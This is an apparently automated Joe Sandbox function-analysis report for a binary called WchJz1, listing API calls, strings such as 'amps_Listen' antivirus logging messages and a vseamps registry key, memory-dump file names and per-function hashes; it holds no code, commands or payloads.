Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704

Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 000000014000E388

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40

Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 000000014000F398

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00

Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00

Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40

Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00000001400092EB

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700

Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40

Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40

Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

-, xrefs: 000000014000E358

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40

Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704

Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710

Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700

Function 00007FFE11BDFD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction ID: 3fbc59a65abde0dc0beb7e712bd3eb4cf2b288d0e6b1be30fc85ecd7bf8ab49f
Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
Instruction Fuzzy Hash: FEF0C271B1D6A5CAEBA98F2DA802E2937D5E748390F84D079D68D83B24C63D94608F04

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseGlobalInit, xrefs: 00000001400010C8
MsiLocateComponentW, xrefs: 0000000140001062
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseGet, xrefs: 000000014000114B
vseSet, xrefs: 0000000140001166
vseGlobalRelease, xrefs: 00000001400010DF
msi.dll, xrefs: 0000000140001042
vseInit, xrefs: 00000001400010FA
vseRelease, xrefs: 0000000140001115
vseExec, xrefs: 0000000140001130

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

?, xrefs: 0000000140002FFE
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
action, xrefs: 0000000140003020

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
